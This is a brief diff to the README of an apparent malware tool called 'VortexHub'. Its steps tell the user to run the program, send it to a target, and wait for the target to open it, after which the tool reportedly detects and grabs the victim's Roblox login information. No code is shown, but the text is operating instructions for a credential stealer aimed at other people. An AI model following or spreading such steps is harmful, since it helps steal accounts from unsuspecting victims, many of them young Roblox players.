ywnwrld/VortexHub/README.md

 Run "VortexHub"
 Send To Target
-Wait until Opened and Put a Text File To Your Documents
+Wait until Opened
+Once the Target Opens.
+It Auto Detext Roblox Login and Grabs It Info For You